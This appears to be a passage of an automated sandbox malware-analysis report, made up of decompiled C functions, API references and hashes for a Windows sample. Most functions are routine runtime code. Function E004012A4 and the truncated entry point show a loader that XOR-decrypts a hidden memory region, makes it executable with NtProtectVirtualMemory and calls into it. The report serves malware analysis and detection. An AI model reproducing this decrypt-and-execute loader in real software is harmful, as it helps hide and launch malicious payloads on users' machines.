                                                    • Part of subcall function 0041551F: CloseHandle.KERNEL32(FFFFFFFE,00415569,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?,?), ref: 0041552F
                                                  • ___initconout.LIBCMT ref: 00415569
                                                    • Part of subcall function 004154E1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00415510,00414F7B,?,?,004143C3,?,?,?,?), ref: 004154F4
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?), ref: 0041557E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2d8ac9ef8f63f7714d5b00175ba2915e48e71532897148875e161aace9fc90f8
                                                  • Instruction ID: f1419c9f16314b9901f95169123d81b2106f70cdfcc9624f67980f7e0c5d3866
                                                  • Opcode Fuzzy Hash: 2d8ac9ef8f63f7714d5b00175ba2915e48e71532897148875e161aace9fc90f8
                                                  • Instruction Fuzzy Hash: 8DF01C36140518BFCF222FD2DC08ACA3F67EF483A1B058025FB1885131CB328860DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040D516() {
                                                  				void* _t4;
                                                  				void* _t8;
                                                  
                                                  				E0040DA18();
                                                  				E0040D9AC();
                                                  				if(E0040D729() != 0) {
                                                  					_t4 = E0040D6DB(_t8, __eflags);
                                                  					__eflags = _t4;
                                                  					if(_t4 != 0) {
                                                  						return 1;
                                                  					} else {
                                                  						E0040D765();
                                                  						goto L1;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  			}






                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0040D516
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0040D51B
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0040D520
                                                    • Part of subcall function 0040D729: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040D73A
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0040D535
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: af21acef9519ee4236ba89e1a403b3f3bcb15de50a8f2c9825fe419760bfa6fc
                                                  • Instruction ID: d0b2e603007e074d6a98ca05a71982cc59f5e292db5baa7813cf6e41e760b44f
                                                  • Opcode Fuzzy Hash: af21acef9519ee4236ba89e1a403b3f3bcb15de50a8f2c9825fe419760bfa6fc
                                                  • Instruction Fuzzy Hash: 46C00268D4420160DC103AF63A021BE131008933CCB9024BBEC41376C3993E040E6D6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406790(void* __edi, intOrPtr _a4, char _a8) {
                                                  				long _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				long _v20;
                                                  				void* _v24;
                                                  				struct tagLOGFONTW _v116;
                                                  
                                                  				E0040D210(__edi,  &_v116, 0, 0x5c);
                                                  				_v116.lfCharSet = 1;
                                                  				_v116.lfPitchAndFamily = 0x31;
                                                  				_v24 = _a4;
                                                  				_t6 =  &_a8; // 0x404928
                                                  				_v16 =  *((intOrPtr*)( *_t6 + 0x44));
                                                  				_t9 =  &_a8; // 0x404928
                                                  				_v12 =  *((intOrPtr*)( *_t9 + 0x40));
                                                  				_v8 = 0;
                                                  				_v20 = 0;
                                                  				while(_v20 <= 5) {
                                                  					EnumFontFamiliesExW( *( *(_a4 + 0x84)),  &_v116, E00403550,  &_v24, 0);
                                                  					if(_v8 == 0) {
                                                  						_v20 = _v20 + 1;
                                                  						continue;
                                                  					} else {
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t25 =  &_a8; // 0x404928
                                                  				 *((intOrPtr*)( *_t25 + 0x40)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x80));
                                                  				_t30 =  &_a8; // 0x404928
                                                  				 *((intOrPtr*)( *_t30 + 0x44)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x82));
                                                  				_t35 =  &_a8; // 0x404928
                                                  				 *((intOrPtr*)( *_t35 + 0x84)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x86));
                                                  				_t43 =  &_a8; // 0x404928
                                                  				E0040CC90( *_t43 + 0x8c,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) + 0x88)),  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) << 1);
                                                  				_t47 =  &_a8; // 0x404928
                                                  				 *((short*)( *_t47 + 0x8c +  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) * 2)) = 0;
                                                  				_t51 =  &_a8; // 0x404928
                                                  				return E00405CF0(0,  *_t51);
                                                  			}










                                                  APIs
                                                  • EnumFontFamiliesExW.GDI32(?,?,Function_00003550,?,00000000), ref: 00406800
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnumFamiliesFont
                                                  • String ID: (I@$1
                                                  • API String ID: 2229041460-19130419
                                                  • Opcode ID: 512abf597975d532bad3b19b9d7508a8e3a11f246e487422d4e14e93115da64e
                                                  • Instruction ID: 8981e6ccffa7fcf40342c6634695e992f66a12565622c359e3784dbe14f92210
                                                  • Opcode Fuzzy Hash: 512abf597975d532bad3b19b9d7508a8e3a11f246e487422d4e14e93115da64e
                                                  • Instruction Fuzzy Hash: C7411934600208EBDB04DF58C484FAAB7B5FF48314F14C16AEC499F392D775AA81CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E004074C0(void* __ecx, intOrPtr _a4, void* _a8, long _a12) {
                                                  				DWORD* _v8;
                                                  				intOrPtr _t32;
                                                  				int _t35;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  
                                                  				if(_a12 == 0) {
                                                  					L2:
                                                  					return _t32;
                                                  				}
                                                  				_t32 = _a4;
                                                  				if( *((intOrPtr*)(_t32 + 0xb4)) == 0) {
                                                  					goto L2;
                                                  				}
                                                  				if( *((intOrPtr*)(_a4 + 0x10b8)) + _a12 > 0x1000) {
                                                  					E00407060(_a4);
                                                  				}
                                                  				if( *((intOrPtr*)(_a4 + 0x10b8)) + _a12 <= 0x1000) {
                                                  					_t17 =  *((intOrPtr*)(_a4 + 0x10b8)) + 0xb8; // 0xb8
                                                  					E0040CC90(_a4 + _t17, _a8, _a12);
                                                  					_t40 = _a4;
                                                  					 *((intOrPtr*)(_a4 + 0x10b8)) =  *((intOrPtr*)(_t40 + 0x10b8)) + _a12;
                                                  					return _t40;
                                                  				}
                                                  				if( *((intOrPtr*)(_a4 + 0x10b8)) != 0) {
                                                  					_v8 = 0;
                                                  				} else {
                                                  					_v8 = 1;
                                                  				}
                                                  				0x400000(_v8);
                                                  				_t35 = WriteFile( *(_a4 + 0xb4), _a8, _a12, 0, 0);
                                                  				if(_t35 == 0) {
                                                  					_t36 = GetLastError();
                                                  					0x400000("write failed: %lu\n", _t36);
                                                  					return _t36;
                                                  				}
                                                  				return _t35;
                                                  			}









                                                  APIs
                                                  • WriteFile.KERNEL32(?,10C25DE5,00000000,00000000,00000000,?,0040467F,00000000,0041F000,00000006,?,004074AD,00000000), ref: 00407582
                                                  • GetLastError.KERNEL32(?,0040467F,00000000,0041F000,00000006,?,004074AD,00000000), ref: 0040758C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: write failed: %lu
                                                  • API String ID: 442123175-171016427
                                                  • Opcode ID: 2602b3359f5a1c97a8c33e3dff1b4c6f9208dacf72227efde1db13597fde5908
                                                  • Instruction ID: 7f7a1467d5cdc78d0fed5de39304c31363ad617d69b993743f8251a44aee7515
                                                  • Opcode Fuzzy Hash: 2602b3359f5a1c97a8c33e3dff1b4c6f9208dacf72227efde1db13597fde5908
                                                  • Instruction Fuzzy Hash: 14212A74608248EBCB00CF44C894FEA376AAB48348F14827AF9485B781C775E985CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00408370(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                  				int _v8;
                                                  				intOrPtr _t16;
                                                  
                                                  				_v8 = 0x32;
                                                  				_t16 = _a4;
                                                  				if( *((intOrPtr*)(_t16 + 0x84)) == 0 ||  *( *((intOrPtr*)(_a4 + 0x84)) + 0x64) != 0) {
                                                  					return _t16;
                                                  				} else {
                                                  					 *( *((intOrPtr*)(_a4 + 0x84)) + 0x64) = 1;
                                                  					if(_a8 == 0) {
                                                  						return PostMessageW( *(_a4 + 0xa8), 0x401, 0, 0);
                                                  					}
                                                  					return SetTimer( *(_a4 + 0xa8), 1, _v8, 0);
                                                  				}
                                                  			}






                                                  APIs
                                                  • SetTimer.USER32(?,00000001,00000032,00000000), ref: 004083C0
                                                  • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 004083DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: MessagePostTimer
                                                  • String ID: 2
                                                  • API String ID: 2370412193-450215437
                                                  • Opcode ID: a18fc1b7731bf4d073329e2cfda384fe3d80195ac6b973d5940686955f304314
                                                  • Instruction ID: 1a3cc5ff3191fa17380487d510b67bf448f26f83c6958252bb8512d12d28dec7
                                                  • Opcode Fuzzy Hash: a18fc1b7731bf4d073329e2cfda384fe3d80195ac6b973d5940686955f304314
                                                  • Instruction Fuzzy Hash: 0801E870240304EFD714CF44C949FA97BA5BB84705F1481B9FE895F2D1CBB6A985CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00407060(intOrPtr _a4) {
                                                  				intOrPtr _t12;
                                                  				long _t15;
                                                  
                                                  				_t12 = _a4;
                                                  				if( *((intOrPtr*)(_t12 + 0xb4)) == 0 ||  *(_a4 + 0x10b8) == 0) {
                                                  					return _t12;
                                                  				} else {
                                                  					_t15 = WriteFile( *(_a4 + 0xb4), _a4 + 0xb8,  *(_a4 + 0x10b8), 0, 0);
                                                  					if(_t15 == 0) {
                                                  						_t15 = GetLastError();
                                                  						0x400000("write failed: %lu\n", _t15);
                                                  					}
                                                  					 *(_a4 + 0x10b8) = 0;
                                                  					return _t15;
                                                  				}
                                                  			}






                                                  APIs
                                                  • WriteFile.KERNEL32(?,-000000B8,?,00000000,00000000,?,004074B6,00000000), ref: 0040709F
                                                  • GetLastError.KERNEL32(?,004074B6,00000000), ref: 004070A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: write failed: %lu
                                                  • API String ID: 442123175-171016427
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403FE0(void* __ecx, intOrPtr _a4, char _a8) {
                                                  				long _v8;
                                                  
                                                  				_t1 =  &_a8; // 0x403de4
                                                  				_v8 = GetWindowLongW(GetDlgItem( *(_a4 + 0xd0),  *_t1), 0);
                                                  				return  *((intOrPtr*)(_a4 + 4 + _v8 * 4));
                                                  			}





                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ItemLongWindow
                                                  • String ID: =@
                                                  • API String ID: 3725497266-4161117618
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.4%
                                                  Dynamic/Decrypted Code Coverage:2.3%
                                                  Signature Coverage:4.9%
                                                  Total number of Nodes:654
                                                  Total number of Limit Nodes:81

                                                  Control-flow Graph

                                                  C-Code - Quality: 49%
                                                  			E004012A4(signed char __eax, unsigned int __ebx, void* __ecx, void* __edx) {
                                                  				short _v2;
                                                  				long _v4;
                                                  				intOrPtr _v8;
                                                  				short _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				signed int _v32;
                                                  				char _v33;
                                                  				short _v35;
                                                  				long _v39;
                                                  				short _v40;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				signed int _v64;
                                                  				void* _v68;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				char _v81;
                                                  				short _v83;
                                                  				long _v87;
                                                  				short _v88;
                                                  				short _v92;
                                                  				signed int _v96;
                                                  				char _v104;
                                                  				char _v112;
                                                  				char _v113;
                                                  				char _v114;
                                                  				signed int _v116;
                                                  				long _v120;
                                                  				long _v124;
                                                  				short _v126;
                                                  				short _v130;
                                                  				char _v148;
                                                  				char _v160;
                                                  				signed char _t86;
                                                  				void* _t98;
                                                  				void* _t110;
                                                  				void* _t126;
                                                  				signed int _t130;
                                                  				void* _t136;
                                                  				void* _t138;
                                                  				unsigned int _t141;
                                                  				void* _t148;
                                                  				unsigned int _t149;
                                                  				signed int _t151;
                                                  
                                                  				_t86 = __eax;
                                                  				_t121 = __ebx >> 1;
                                                  				_t149 = _t121;
                                                  				if(_t149 >= 0) {
                                                  					L3:
                                                  					_t151 = _t86 & 0x00000000;
                                                  					 *_t86 =  *_t86 + _t86;
                                                  					asm("xorps xmm0, xmm0");
                                                  					asm("movq [ebp-0x67], xmm0");
                                                  					asm("movq [ebp-0x5f], xmm0");
                                                  					asm("movq [ebp-0x6f], xmm0");
                                                  					asm("movq [ebp-0x37], xmm0");
                                                  					asm("movq [ebp-0x2f], xmm0");
                                                  					asm("movdqa [ebp-0x70], xmm0");
                                                  				} else {
                                                  					if(_t149 > 0) {
                                                  						_push(_t121);
                                                  						_t121 = _t141;
                                                  						_t148 = (_t141 - 0x00000008 & 0xfffffff0) + 4;
                                                  						_push(_t138);
                                                  						_v8 =  *((intOrPtr*)(_t141 + 4));
                                                  						_t138 = _t148;
                                                  						_t141 = _t148 - 0xa8;
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				asm("movq [ebp-0x70], mm0");
                                                  				asm("movq [ebp-0x3f], xmm0");
                                                  				asm("movq [ebp-0x9c], xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v80 = 0xdf82a1b5;
                                                  				_v76 = 0x961d1ca3;
                                                  				asm("movq xmm0, [ebp-0x50]");
                                                  				asm("movq [ebp-0x70], xmm0");
                                                  				asm("xorps xmm0, xmm0");
                                                  				_v104 = 0x28;
                                                  				asm("movdqa [ebp-0x40], xmm0");
                                                  				asm("movq [ebp-0x30], xmm0");
                                                  				_v32 = 0x9866c596;
                                                  				asm("movq [ebp-0xc], xmm0");
                                                  				_v28 = 0x7b1dba2;
                                                  				asm("movq xmm0, [ebp-0x20]");
                                                  				asm("movq [ebp-0x40], xmm0");
                                                  				_v60 = _v60 ^ 0x10222f38;
                                                  				_v64 = _v32 ^ 0x10222f38;
                                                  				_v16 = 0xf7da08e6;
                                                  				_v24 = 0x691d4748;
                                                  				_v20 = 0x87e62da;
                                                  				asm("movq xmm0, [ebp-0x18]");
                                                  				asm("movq [ebp-0x38], xmm0");
                                                  				_v56 = _v56 ^ 0x10222f38;
                                                  				_v52 = _v52 ^ 0x10222f38;
                                                  				_v87 = 0;
                                                  				_v39 = 0;
                                                  				_v160 = 0;
                                                  				_v83 = 0;
                                                  				_v81 = 0;
                                                  				_v35 = 0;
                                                  				_v33 = 0;
                                                  				_v88 = 0;
                                                  				_v40 = 0;
                                                  				_v4 = 0;
                                                  				_v48 = _v16 ^ 0x10222f38;
                                                  				E004016B0(_t121,  &_v112, 9,  &_v64);
                                                  				_v148 = 0;
                                                  				_v130 = 0;
                                                  				_v126 = 0;
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movq [ebp-0x92], xmm0");
                                                  				asm("movq [ebp-0x8a], xmm0");
                                                  				E00401260( &_v148,  &_v112);
                                                  				_t98 = E00401190(_t151,  &_v148);
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movdqa [ebp-0x70], xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v88 = 0;
                                                  				E004016B0(_t121,  &_v112, 0xa,  &_v64);
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v16 = 0x5a1c48e0;
                                                  				_v96 = _v16;
                                                  				_v12 = 0xfb7d;
                                                  				asm("movdqa [ebp-0x70], xmm0");
                                                  				_v92 = _v12;
                                                  				asm("movq [ebp-0xa], xmm0");
                                                  				_v32 = 0x63682b43;
                                                  				_v28 = 0xbf4e8842;
                                                  				asm("movq xmm0, [ebp-0x20]");
                                                  				asm("movq [ebp-0x70], xmm0");
                                                  				_v24 = 0x7757d946;
                                                  				_v20 = 0xc888339;
                                                  				asm("movq xmm0, [ebp-0x18]");
                                                  				_v88 = 0;
                                                  				_v2 = 0;
                                                  				asm("movq [ebp-0x68], xmm0");
                                                  				E004016B0(_t121,  &_v112, 0x16,  &_v64);
                                                  				E004010A0( &_v160, _t98,  &_v112, 0, 0);
                                                  				_v68 = 0;
                                                  				_t110 = E00401730();
                                                  				_t126 = 0;
                                                  				while(1) {
                                                  					_t130 =  *(_t126 + _t110) ^ 0x11a7a880;
                                                  					_v116 = _t130;
                                                  					if(_t130 == 0x3e && _t130 == 0x97 && _v114 == 0xbd && _v113 == 0xba) {
                                                  						break;
                                                  					}
                                                  					_t126 = _t126 + 1;
                                                  					if(_t126 < 0x4000) {
                                                  						continue;
                                                  					} else {
                                                  						_t136 = _v68;
                                                  					}
                                                  					L11:
                                                  					_v120 = 0;
                                                  					_v124 = 0x2ca00;
                                                  					NtProtectVirtualMemory(0xffffffff,  &_v68,  &_v124, 0x40,  &_v120); // executed
                                                  					_v64 = _v64 ^ 0x11a7a880;
                                                  					_v60 = _v60 ^ 0x11a7a880;
                                                  					_v56 = _v56 ^ 0x11a7a880;
                                                  					_v52 = _v52 ^ 0x11a7a880;
                                                  					_v48 = _v48 ^ 0x11a7a880;
                                                  					E004016B0(_t121, _t136, 0x2ca00,  &_v64);
                                                  					_t83 = _t136 + 0x21810; // 0x21810, executed
                                                  					 *_t83(); // executed
                                                  					return 0;
                                                  				}
                                                  				_t136 = _t126 + _t110;
                                                  				_v68 = _t136;
                                                  				goto L11;
                                                  			}

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID: C+hc
                                                  • API String ID: 2706961497-3848425603
                                                  • Opcode ID: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                                  • Instruction ID: 5f2fc46273f2a988fd33b2da9c61ea0e16046221c740d3513727dfc5c87a36e1
                                                  • Opcode Fuzzy Hash: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                                  • Instruction Fuzzy Hash: 758146B1C2075CAADF10CFE4CC41AEEBBB4BF99300F60421EE415BB291EB7516858B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 47%
                                                  			_entry_(signed int __eax) {
                                                  				intOrPtr _v8;
                                                  				short _v14;
                                                  				long _v16;
                                                  				short _v24;
                                                  				signed int _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				char _v45;
                                                  				short _v47;
                                                  				long _v51;
                                                  				short _v52;
                                                  				signed int _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				void* _v80;
                                                  				intOrPtr _v88;
                                                  				intOrPtr _v92;
                                                  				char _v93;
                                                  				short _v95;
                                                  				long _v99;
                                                  				short _v100;
                                                  				short _v104;
                                                  				signed int _v108;
                                                  				char _v116;
                                                  				char _v124;
                                                  				char _v125;
                                                  				char _v126;
                                                  				signed int _v128;
                                                  				long _v132;
                                                  				long _v136;
                                                  				short _v138;
                                                  				short _v142;
                                                  				char _v160;
                                                  				char _v172;
                                                  				void* __ebx;
                                                  				void* _t97;
                                                  				void* _t109;
                                                  				void* _t122;
                                                  				signed int _t124;
                                                  				void* _t130;
                                                  				void* _t136;
                                                  				signed int _t146;
                                                  
                                                  				_t119 = _t136;
                                                  				_v8 =  *((intOrPtr*)(_t136 + 4));
                                                  				_t146 = __eax & 0x00000000;
                                                  				 *__eax =  *__eax + __eax;
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movq [ebp-0x67], xmm0");
                                                  				asm("movq [ebp-0x5f], xmm0");
                                                  				asm("movq [ebp-0x6f], xmm0");
                                                  				asm("movq [ebp-0x37], xmm0");
                                                  				asm("movq [ebp-0x2f], xmm0");
                                                  				asm("movdqa [ebp-0x70], xmm0");
                                                  				asm("movq [ebp-0x70], mm0");
                                                  				asm("movq [ebp-0x3f], xmm0");
                                                  				asm("movq [ebp-0x9c], xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v92 = 0xdf82a1b5;
                                                  				_v88 = 0x961d1ca3;
                                                  				asm("movq xmm0, [ebp-0x50]");
                                                  				asm("movq [ebp-0x70], xmm0");
                                                  				asm("xorps xmm0, xmm0");
                                                  				_v116 = 0x28;
                                                  				asm("movdqa [ebp-0x40], xmm0");
                                                  				asm("movq [ebp-0x30], xmm0");
                                                  				_v44 = 0x9866c596;
                                                  				asm("movq [ebp-0xc], xmm0");
                                                  				_v40 = 0x7b1dba2;
                                                  				asm("movq xmm0, [ebp-0x20]");
                                                  				asm("movq [ebp-0x40], xmm0");
                                                  				_v72 = _v72 ^ 0x10222f38;
                                                  				_v76 = _v44 ^ 0x10222f38;
                                                  				_v28 = 0xf7da08e6;
                                                  				_v36 = 0x691d4748;
                                                  				_v32 = 0x87e62da;
                                                  				asm("movq xmm0, [ebp-0x18]");
                                                  				asm("movq [ebp-0x38], xmm0");
                                                  				_v68 = _v68 ^ 0x10222f38;
                                                  				_v64 = _v64 ^ 0x10222f38;
                                                  				_v99 = 0;
                                                  				_v51 = 0;
                                                  				_v172 = 0;
                                                  				_v95 = 0;
                                                  				_v93 = 0;
                                                  				_v47 = 0;
                                                  				_v45 = 0;
                                                  				_v100 = 0;
                                                  				_v52 = 0;
                                                  				_v16 = 0;
                                                  				_v60 = _v28 ^ 0x10222f38;
                                                  				E004016B0(_t119,  &_v124, 9,  &_v76);
                                                  				_v160 = 0;
                                                  				_v142 = 0;
                                                  				_v138 = 0;
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movq [ebp-0x92], xmm0");
                                                  				asm("movq [ebp-0x8a], xmm0");
                                                  				E00401260( &_v160,  &_v124);
                                                  				_t97 = E00401190(_t146,  &_v160);
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movdqa [ebp-0x70], xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v100 = 0;
                                                  				E004016B0(_t119,  &_v124, 0xa,  &_v76);
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movq [ebp-0x60], xmm0");
                                                  				_v28 = 0x5a1c48e0;
                                                  				_v108 = _v28;
                                                  				_v24 = 0xfb7d;
                                                  				asm("movdqa [ebp-0x70], xmm0");
                                                  				_v104 = _v24;
                                                  				asm("movq [ebp-0xa], xmm0");
                                                  				_v44 = 0x63682b43;
                                                  				_v40 = 0xbf4e8842;
                                                  				asm("movq xmm0, [ebp-0x20]");
                                                  				asm("movq [ebp-0x70], xmm0");
                                                  				_v36 = 0x7757d946;
                                                  				_v32 = 0xc888339;
                                                  				asm("movq xmm0, [ebp-0x18]");
                                                  				_v100 = 0;
                                                  				_v14 = 0;
                                                  				asm("movq [ebp-0x68], xmm0");
                                                  				E004016B0(_t119,  &_v124, 0x16,  &_v76);
                                                  				E004010A0( &_v172, _t97,  &_v124, 0, 0);
                                                  				_v80 = 0;
